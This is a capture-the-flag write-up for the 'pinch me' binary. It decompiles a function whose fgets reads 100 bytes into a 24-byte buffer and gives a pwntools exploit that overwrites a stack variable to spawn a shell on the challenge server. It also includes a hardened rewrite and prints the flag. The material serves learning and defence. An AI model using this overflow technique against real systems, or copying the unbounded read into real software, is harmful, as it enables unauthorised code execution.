Description
This should be easy!
nc dctf1-chall-pinch-me.westeurope.azurecontainer.io 7480
Preface
We got a binary that asks us "Am I dreaming?" and, given ordinary input, then prints "Pinch me!".
Overview
Loading the binary into Ghidra, we can see that the interaction happens in the function vuln (Ghidra decompilation; the two headers are added so the snippet compiles as-is):

```c
#include <stdio.h>
#include <stdlib.h>

void vuln(void)
{
  char local_28 [24];
  int local_10;
  int local_c;

  local_c = 0x1234567;
  local_10 = -0x76543211;
  puts("Is this a real life, or is it just a fanta sea?");
  puts("Am I dreaming?");
  fgets(local_28,100,stdin);          /* reads up to 100 bytes into a 24-byte buffer */
  if (local_10 == 0x1337c0de) {
    system("/bin/sh");
  }
  else {
    if (local_c == 0x1234567) {
      puts("Pinch me!");
    }
    else {
      puts("Pinch me harder!");
    }
  }
  return;
}
```
Based on this, local_28 is only 24 bytes while fgets reads up to 100, so overwriting the local_10 variable (the one compared against 0x1337c0de, sitting right after the buffer) with 0x1337c0de gives me a shell.
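For comparison, a hardened rewrite of vuln() (an added example, not the challenge's code): bounding fgets by sizeof buf and rejecting lines that did not fit closes the overflow. read_answer, check_input and the return codes are names chosen here; the function takes a FILE* so it can be run on constructed input.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return codes for read_answer() (names chosen for this example). */
enum { INPUT_OK = 0, INPUT_EMPTY = -1, INPUT_TOO_LONG = -2, STATE_CORRUPTED = -3 };

/* Hardened vuln(): fgets() is bounded by sizeof buf, so the 100-byte read
 * that let the payload reach local_10 is gone. Takes a FILE* rather than
 * stdin so it can be exercised on constructed input. */
int read_answer(FILE *in)
{
    char buf[24];
    volatile int local_c  = 0x1234567;   /* same markers as the binary */
    volatile int local_10 = -0x76543211;

    if (fgets(buf, sizeof buf, in) == NULL)
        return INPUT_EMPTY;

    /* No newline in buf means the line was longer than the buffer (unless
     * the input just ended): drain the rest and reject it, don't truncate. */
    if (strchr(buf, '\n') == NULL) {
        int c = fgetc(in);
        if (c != EOF) {
            while (c != EOF && c != '\n')
                c = fgetc(in);
            return INPUT_TOO_LONG;
        }
    }
    /* With a bounded read these can only hold their initial values. */
    if (local_10 != -0x76543211 || local_c != 0x1234567)
        return STATE_CORRUPTED;
    return INPUT_OK;
}

/* Run read_answer() over an in-memory string, e.g. a captured payload. */
int check_input(const char *line)
{
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL)
        return STATE_CORRUPTED;
    int rc = read_answer(in);
    fclose(in);
    return rc;
}
```

Feeding the 24-byte filler plus p64(0x1337c0de) from the exploit below into check_input now yields INPUT_TOO_LONG rather than a shell; answers of up to 22 characters plus newline are accepted.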
This was pretty easy, I only needed to be careful to use the correct endianness. Pwntools' p64 packs the value correctly.
My final exploit was:
```python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
#context.log_level = "DEBUG"
context.log_level = "INFO"
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']

vulnerable = './pinch_me'
#p = process( vulnerable )
p = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)

p.readuntil(b'Am I dreaming?')
# 24 bytes fill local_28; the following bytes land in local_10 (little-endian via p64)
p.sendline(b'\x41'*24 + p64(0x1337c0de))
#p.readuntil(b'will this work')
p.read( 2048, timeout=1 ) # cleanup output
p.interactive()
```
Then I just needed to print the file flag.txt.
The flag was:
dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}